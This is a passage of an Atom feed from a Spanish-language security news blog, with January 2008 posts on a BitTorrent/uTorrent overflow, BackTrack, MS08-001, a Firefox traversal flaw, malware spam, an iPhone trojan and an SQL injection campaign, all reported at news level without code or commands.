y uTorrent</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_nams9blykQY/R6H7BbB7JdI/AAAAAAAAACI/omvAcVCI3lA/s1600-h/bittorrent.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://4.bp.blogspot.com/_nams9blykQY/R6H7BbB7JdI/AAAAAAAAACI/omvAcVCI3lA/s320/bittorrent.jpg" alt="" id="BLOGGER_PHOTO_ID_5161682649797567954" border="0" /&gt;&lt;/a&gt;BitTorrent y uTorrent, son propensos a una vulnerabilidad que permite a un atacante la ejecución remota de código. Son afectadas las versiones para Windows, Mac y Linux (estas últimas solo existen en BitTorrent).&lt;br /&gt;El problema se debe a que la aplicación no realiza un correcto filtrado de la información enviada por el usuario.&lt;br /&gt;&lt;br /&gt;Ambos son los clientes más populares utilizados para descarga de archivos P2P, utilizando el protocolo bittorrent, y fueron creados a partir del mismo código base.&lt;br /&gt;&lt;br /&gt;Por defecto, los dos programas muestran una ventana con información detallada acerca del estado de la red y los rastreadores en uso, además de datos sobre otros clientes conectados, tales como el porcentaje de disponibilidad del torrent compartido, su dirección IP, país, velocidad, la cantidad de datos recibidos y enviados, y la versión del cliente.&lt;br /&gt;&lt;br /&gt;Cuando el contenido de la ventana es visualizado por el usuario, estos datos (cadenas en formato unicode), son copiados a un búfer utilizado por la interfase gráfica.&lt;br /&gt;&lt;br /&gt;Si esta cadena supera un determinado tamaño, puede sobrescribir información crítica, provocando el fallo del programa.&lt;br /&gt;&lt;br /&gt;La explotación puede ser posible si un atacante se conecta a un puerto al azar abierto en el cliente, y envía datos manipulados para superar ciertos límites.&lt;br /&gt;&lt;br /&gt;Cuando esta vulnerabilidad fue hecha pública, con prueba de concepto incluida, se pensaba que un ataque solo podría hacer que el programa dejara de responder, provocando una denegación de servicio. Información más reciente indica que la ejecución arbitraria de código con los mismos privilegios del usuario actual, es posible,&lt;br /&gt;&lt;br /&gt;La vulnerabilidad afecta a los siguientes productos:&lt;br /&gt;&lt;br /&gt;- BitTorrent 6.0 (y versiones anteriores)&lt;br /&gt;- uTorrent 1.7.5 (y versiones anteriores)&lt;br /&gt;- uTorrent 1.8-alpha-7834 (y versiones anteriores)&lt;br /&gt;&lt;br /&gt;Se sabe que uTorrent 1.7.6, liberado inmediatamente después de haberse conocido la vulnerabilidad, corrige el problema.&lt;br /&gt;&lt;br /&gt;También lo habría solucionado la versión 6.0.1 de BitTorrent, pero no ha sido confirmado al momento de publicarse esta alerta de seguridad.&lt;br /&gt;&lt;br /&gt;Los usuarios de uTorrent pueden descargar la nueva versión desde el siguiente enlace:&lt;br /&gt;&lt;a href="http://download.utorrent.com/1.7.6/utorrent.exe"&gt;download.utorrent.com/1.7.6/utorrent.exe&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;BitTorrent 6.0.1 está disponible en el siguiente enlace:&lt;br /&gt;&lt;a href="http://www.bittorrent.com/download?csrc=header"&gt;www.bittorrent.com/download?csrc=header&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Fuente: &lt;a href="http://seguinfo.blogspot.com/2008/01/ejecucin-remota-de-cdigo-en-bittorrent.html"&gt;segu-info&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-3093253315449895777?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/3093253315449895777/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=3093253315449895777&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/3093253315449895777'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/3093253315449895777'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2008/01/ejecucin-remota-de-cdigo-en-bittorrent.html' title='Ejecución remota de código en BitTorrent y uTorrent'/><author><name>Barnisimo</name><uri>http://www.blogger.com/profile/01972106911791737364</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_nams9blykQY/R6H7BbB7JdI/AAAAAAAAACI/omvAcVCI3lA/s72-c/bittorrent.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-8550002014286760835</id><published>2008-01-27T15:46:00.000-02:00</published><updated>2008-12-10T12:33:55.888-02:00</updated><title type='text'>BackTrack</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_nams9blykQY/R5zHE7B7JcI/AAAAAAAAACA/AWRXAIWXvLM/s1600-h/BackTrack_1.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer;" src="http://1.bp.blogspot.com/_nams9blykQY/R5zHE7B7JcI/AAAAAAAAACA/AWRXAIWXvLM/s320/BackTrack_1.jpg" alt="" id="BLOGGER_PHOTO_ID_5160218160438912450" border="0" /&gt;&lt;/a&gt;&lt;b&gt;BackTrack&lt;/b&gt; es una &lt;a href="http://es.wikipedia.org/wiki/Distribuci%C3%B3n_Linux" title="Distribución Linux"&gt;distribución&lt;/a&gt; &lt;a href="http://es.wikipedia.org/wiki/GNU/Linux" title="GNU/Linux"&gt;GNU/Linux&lt;/a&gt; en formato &lt;a href="http://es.wikipedia.org/wiki/LiveCD" title="LiveCD"&gt;LiveCD&lt;/a&gt; pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve entorno a la &lt;a href="http://es.wikipedia.org/wiki/Seguridad_inform%C3%A1tica" title="Seguridad informática"&gt;seguridad informática&lt;/a&gt;. &lt;p&gt;Deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el &lt;a href="http://es.wikipedia.org/w/index.php?title=Auditor_Security_Collection&amp;amp;action=edit" class="new" title="Auditor Security Collection"&gt;Auditor&lt;/a&gt; + &lt;a href="http://es.wikipedia.org/wiki/WHAX" title="WHAX"&gt;WHAX&lt;/a&gt;.&lt;/p&gt; &lt;p&gt;&lt;a href="http://es.wikipedia.org/wiki/WHAX" title="WHAX"&gt;WHAX&lt;/a&gt; a su vez fue la evolución del &lt;a href="http://es.wikipedia.org/wiki/Whoppix" title="Whoppix"&gt;Whoppix&lt;/a&gt;(WhiteHat Knoppix) el cual paso a basarse en &lt;a href="http://es.wikipedia.org/wiki/SLAX" title="SLAX"&gt;SLAX&lt;/a&gt; en lugar de en Knoppix.&lt;/p&gt; &lt;p&gt;Incluye larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de &lt;a href="http://es.wikipedia.org/wiki/Exploit" title="Exploit"&gt;exploits&lt;/a&gt;, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless.&lt;/p&gt; &lt;p&gt;Fue incluida en la famosa lista &lt;i&gt;Top 100 Network Security Tools&lt;/i&gt; del 2006 disponible en &lt;a href="http://sectools.org/" class="external text" title="http://sectools.org" rel="nofollow"&gt;SecTools.Org&lt;/a&gt;&lt;/p&gt; &lt;p&gt;Puede encontrarse más información en la &lt;a href="http://www.remote-exploit.org/index.php/BackTrack" class="external text" title="http://www.remote-exploit.org/index.php/BackTrack" rel="nofollow"&gt;página de Backtrack&lt;/a&gt;, desde donde también es posible &lt;a href="http://www.remote-exploit.org/backtrack_download.html" class="external text" title="http://www.remote-exploit.org/backtrack_download.html" rel="nofollow"&gt;descargarla&lt;/a&gt;.&lt;/p&gt;&lt;br /&gt;&lt;p&gt;Fuente: &lt;a href="http://es.wikipedia.org/wiki/BackTrack"&gt;Wikipedia&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-8550002014286760835?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/8550002014286760835/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=8550002014286760835&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/8550002014286760835'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/8550002014286760835'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2008/01/backtrack.html' title='BackTrack'/><author><name>Barnisimo</name><uri>http://www.blogger.com/profile/01972106911791737364</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_nams9blykQY/R5zHE7B7JcI/AAAAAAAAACA/AWRXAIWXvLM/s72-c/BackTrack_1.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-8021028046121256359</id><published>2008-01-27T15:05:00.000-02:00</published><updated>2008-01-27T15:08:17.128-02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>Exploit para primera vulnerabilidad de Windows en 2008</title><content type='html'>&lt;p&gt;Se ha reportado la existencia de un exploit que se aprovecha de la primera vulnerabilidad de Microsoft Windows de 2008.&lt;/p&gt; &lt;p&gt;La vulnerabilidad, cuyo parche ha sido publicado en el primer boletín del año (MS08-001), fue catalogada como crítica para Windows XP y Vista. Sin embargo, su peligrosidad fue minimizada por comentarios del propio jefe del equipo de seguridad de Microsoft, Jonathan Ness.&lt;br /&gt;&lt;span id="more-4950"&gt;&lt;/span&gt;&lt;br /&gt;Según Ness, aunque el boletín es considerado “crítico”, “existe una serie de factores que hacen que explotar esta vulnerabilidad sea muy difícil y poco probable”.&lt;/p&gt; &lt;p&gt;El problema afecta el procesamiento del Protocolo de control de transmisión / Protocolo de Internet (TCP/IP), un conjunto de protocolos de comunicaciones que se usan para transmitir datos a través de las redes.&lt;/p&gt; &lt;p&gt;Según el boletín, un atacante que se aproveche de esta vulnerabilidad, podría lograr el control completo de un sistema afectado, incluyendo la instalación de software, o la creación de nuevas cuentas con todos los derechos de usuario.&lt;/p&gt; &lt;p&gt;El argumento de Ness, sobre la dificultad de sacar provecho de este fallo, queda ahora en duda, luego de conocerse la existencia del exploit.&lt;/p&gt; &lt;p&gt;Algunos analistas piensan que Microsoft sobrestimó la dificultad de crear un exploit. La posibilidad de crear una forma de ataque confiable parece ser un hecho, aunque sea difícil de automatizarlo, debido a la propia naturaleza del problema (se necesita controlar decenas de miles de paquetes).&lt;/p&gt; &lt;p&gt;Sin embargo, la rentabilidad sería muy alta, ya que esto tiene el potencial de comprometer a numerosos sistemas a la vez, comenta la empresa de seguridad Symantec.&lt;/p&gt; &lt;p&gt;La aparición de un exploit, subraya el interés por esta vulnerabilidad, y pone en riesgo a miles de usuarios que no han actualizado sus sistemas con los últimos parches.&lt;/p&gt; &lt;p&gt;Immunity Inc., compañía creadora del software CANVAS que es utilizado para pruebas de penetración (pen-test), informó que su herramienta fue actualizada para hacer pruebas que afectan a Windows, valiéndose de la vulnerabilidad mencionada.&lt;/p&gt; &lt;p&gt;Dave Aitel, director de tecnología de Immunity, predijo que ésta vulnerabilidad podría llegar a ser una de las más grandes.&lt;/p&gt; Se recomienda a los usuarios de Windows Vista y Windows XP, actualizar su sistema lo antes posible, instalando los parches mencionados, especialmente el descrito en el boletín MS08-001&lt;br /&gt;&lt;br /&gt;Fuente: &lt;a href="http://seguinfo.blogspot.com/2008/01/exploit-para-primera-vulnerabilidad-de_25.html"&gt;Segu-Info&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-8021028046121256359?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/8021028046121256359/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=8021028046121256359&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/8021028046121256359'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/8021028046121256359'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2008/01/exploit-para-primera-vulnerabilidad-de.html' title='Exploit para primera vulnerabilidad de Windows en 2008'/><author><name>Barnisimo</name><uri>http://www.blogger.com/profile/01972106911791737364</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-5813471283087217759</id><published>2008-01-25T00:04:00.000-02:00</published><updated>2008-01-25T00:05:38.733-02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>Nueva vulnerabilidad en Firefox permite saltar directorios y acceder a información</title><content type='html'>&lt;p&gt;Seguimos con el manejo de las URIs y sus secuelas. Ahora es Gerry Eisenhaur quien &lt;a href="http://www.hiredhacker.com/2008/01/19/firefox-chrome-url-handling-directory-traversal" rel="nofollow"&gt;avisa&lt;/a&gt; que el esquema &lt;em&gt;chrome: URI&lt;/em&gt; permite saltar entre directorios, de modo que la visita a una web maliciosa puede proporcionar a un atacante información sobre las aplicaciones instaladas, siempre que la víctima tenga además instalada algunas de las extensiones que utilizan una estructura simple de ficheros de texto, en lugar de ficheros jar (Greasemonkey o la barra de descargas, por ejemplo).&lt;/p&gt; &lt;p&gt;Mozilla &lt;a href="http://blog.mozilla.com/security/2008/01/22/chrome-protocol-directory-traversal/" rel="nofollow"&gt;ha reconocido&lt;/a&gt; el problema y ya &lt;a href="https://bugzilla.mozilla.org/show_bug.cgi?id=413250" rel="nofollow"&gt;está en ello&lt;/a&gt;. Mientras tanto, y como siempre, &lt;a href="http://noscript.net/" rel="nofollow"&gt;NoScript&lt;/a&gt; es tu amigo.&lt;/p&gt;&lt;p&gt;Artículo completo &lt;a href="http://seguinfo.blogspot.com/2008/01/nueva-vulnerabilidad-en-firefox-permite.html"&gt;Segu-Info&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-5813471283087217759?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/5813471283087217759/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=5813471283087217759&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/5813471283087217759'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/5813471283087217759'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2008/01/nueva-vulnerabilidad-en-firefox-permite.html' title='Nueva vulnerabilidad en Firefox permite saltar directorios y acceder a información'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-3428512089891346767</id><published>2008-01-18T00:44:00.000-02:00</published><updated>2008-01-18T00:46:25.435-02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>20.000 dólares por encontrar vulnerabilidades en Windows</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://robertbriones.files.wordpress.com/2007/06/caja-windows-vista.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 200px;" src="http://robertbriones.files.wordpress.com/2007/06/caja-windows-vista.jpg" alt="" border="0" /&gt;&lt;/a&gt;Una compañía de seguridad informática desconocida, denominada &lt;a href="http://digitalarmaments.com/"&gt;Digital Armaments&lt;/a&gt;, ha puesto en marcha el concurso &lt;a href="http://digitalarmaments.com/challanges_open.html"&gt;Hacker’s Challenge&lt;/a&gt;, que ofrece 20.000 dólares a quien revele información sobre agujeros de seguridad no descubiertos en Windows.&lt;br /&gt;&lt;br /&gt;Para acceder al concurso hay que probar y documentar antes del 29 de febrero nuevos exploit o amenazas de tipo “Zero day” que no hayan sido detectadas por empresas de seguridad.&lt;br /&gt;&lt;br /&gt;Aunque no es ilegal que las compañías de seguridad o investigación paguen por detectar vulnerabilidades, este tipo de concursos no suelen sentar muy bien en las grandes compañías de software como Microsoft, en el que las vulnerabilidades de seguridad suelen ser de perfil alto y los de Redmond abogan porque los investigadores comuniquen discretamente el problema para no poner en riesgo a los usuarios. Además las empresas no suelen pagar por las vulnerabilidades de software.&lt;br /&gt;&lt;br /&gt;En todo caso desde InfoWorld han intentado ponerse en contacto con “Digital Armaments” sin conseguirlo. La empresa no tiene accesible dirección ni número de teléfono lo que hace sospechar de esta “competición”.&lt;br /&gt;Artículo &lt;a href="http://seguinfo.blogspot.com/2008/01/20000-dlares-por-encontrar.html"&gt;Segu-info&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-3428512089891346767?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/3428512089891346767/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=3428512089891346767&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/3428512089891346767'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/3428512089891346767'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2008/01/20000-dlares-por-encontrar.html' title='20.000 dólares por encontrar vulnerabilidades en Windows'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-3294997060105938440</id><published>2008-01-16T12:44:00.000-02:00</published><updated>2008-01-16T12:49:06.599-02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Herramientas'/><title type='text'>¿Quién inventó el concepto de firewall?</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.tecnyred.com/sonicwall/firewall.gif"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 228px; height: 161px;" src="http://www.tecnyred.com/sonicwall/firewall.gif" alt="" border="0" /&gt;&lt;/a&gt;Muchos se atribuyen la creación de esta tecnología de seguridad, pero en realidad el mérito no es de una sóla persona: muchos contribuyeron a hacer que una idea que estaba en mente de muchos cristalizase finalmente.&lt;br /&gt;&lt;br /&gt;Nir Zuk, David Pensak, Marcus Ranum o Jeff Mogul, entre otros, se proclaman creadores de este concepto, pero en realidad la idea de firewall surgió como una combinación de todas sus propuestas a la hora de proteger el acceso a máquinas y redes de ordenadores. Incluso William Cheswick y Steven Bellovin, que escribieron un célebre libro al respecto (”Firewalls and Internet Security”, Addison-Wesley, 1994) tuvieron mucho que ver en ese descubrimiento.&lt;br /&gt;&lt;br /&gt;Como indican en DarkReading, el vicepresidente de Gartner, John Pescatore, lo explica según su propia visión: “Cheswick y Bellovin fueron los padres del concepto de firewall de red: usar filtrado de paquetes para denegar el acceso a todo lo que no esté específicamente permitido. Ranum fue el padre del primero “producto” firewall - DEC SEAL, que era Open Source”.&lt;br /&gt;&lt;br /&gt;El resto de personajes contribuyeron de forma definitiva a darle sentido completo a la idea, de modo que parece que no hay un único creador.&lt;br /&gt;&lt;br /&gt;No importa demasiado: los firewalls siguen siendo un mecanismo importante a la hora de tratar de proteger un PC - o red de PCs - ante ataques externos.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://seguinfo.blogspot.com/2008/01/quin-invent-el-concepto-de-firewall.html"&gt;Segu-Info&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-3294997060105938440?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/3294997060105938440/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=3294997060105938440&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/3294997060105938440'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/3294997060105938440'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2008/01/quin-invent-el-concepto-de-firewall.html' title='¿Quién inventó el concepto de firewall?'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-6379632768491301061</id><published>2008-01-13T02:23:00.000-02:00</published><updated>2008-01-13T02:26:18.096-02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>Videos y fotos de la ejecución de Saddam que contienen virus informáticos y spyware</title><content type='html'>Los crackers han evolucionado en sus métodos malévolos y están atacando con campañas masivas de spam con videos y fotos de la ejecución de Saddam Hussein que esconden en su interior virus informáticos y spyware.&lt;br /&gt;&lt;br /&gt;Un virus ha sido identificado como "&lt;a href="http://www.vsantivirus.com/trojandownloader-banload-qm.htm"&gt;Banload&lt;/a&gt;" y contiene el archivo "Saddam morto.scr", el otro sería el "Delf.acc" que contiene al archivo "saddam.exe". Estos virus tienen el objetivo de lucrarse mediante el robo de identidades y claves bancarias para después limpiar las cuentas de sus propietarios.&lt;br /&gt;&lt;br /&gt;Artículo completo &lt;a href="http://www.shellsec.net/articulo/videos-fotos-virus-saddam/"&gt;Shell Security&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-6379632768491301061?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/6379632768491301061/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=6379632768491301061&amp;isPopup=true' title='3 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/6379632768491301061'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/6379632768491301061'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2008/01/videos-y-fotos-de-la-ejecucin-de-saddam.html' title='Videos y fotos de la ejecución de Saddam que contienen virus informáticos y spyware'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-5659034952984037449</id><published>2008-01-10T16:38:00.000-02:00</published><updated>2008-01-10T16:40:35.356-02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>"Troyano" para iPhone</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.tecnogadgets.com/fotografias/iphone_apple_01.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 200px;" src="http://www.tecnogadgets.com/fotografias/iphone_apple_01.jpg" alt="" border="0" /&gt;&lt;/a&gt;Se confirma la existencia de un troyano para el iPhone. Este troyano se ejecuta en los iPhones liberados y podría instalar aplicaciones en los mismos, apareciendo para ello como una actualización al programa Erica’s Utilities, con el nombre de 113.prep.&lt;br /&gt;&lt;br /&gt;Lo que hace es presentar la palabra "shoes" y a quitarla, se elimina la carpeta /bin en el iPhone rompiendo así aplicaciones válidas como Sendfile y Erica’s Utilities.&lt;br /&gt;&lt;br /&gt;Nada grave al menos por ahora.&lt;br /&gt;&lt;br /&gt;Artículo completo &lt;a href="http://seguinfo.blogspot.com/2008/01/troyano-para-iphone.html"&gt;Segu-Info&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-5659034952984037449?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/5659034952984037449/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=5659034952984037449&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/5659034952984037449'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/5659034952984037449'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2008/01/troyano-para-iphone.html' title='&quot;Troyano&quot; para iPhone'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-6090849326288378986</id><published>2008-01-10T13:51:00.000-02:00</published><updated>2008-01-10T13:52:53.634-02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>Vulnerabilidad crítica y muy peligrosa con la técnica “SQL injection”</title><content type='html'>Se ha detectado un ataque con la técnica SQL injection que afecta a sitios web vulnerables que funcionan en servidores IIS y MS SQL. Si se expande, empezará a afectar a sitios web PHP+MySQL.&lt;br /&gt;&lt;br /&gt;Como explican en Internet Storm Center, cuando haces una búsqueda al sitio uc8010.com en Google, obtienes miles de sitios que señalan todos a uc8010.com. Esto es así porque existe un script automatizado o un ataque SQL injection en las aplicaciones vulnerables de la web. Este ataque ya se detectó en noviembre, pero al parecer ha sido ahora extendido y mejorado.&lt;br /&gt;&lt;br 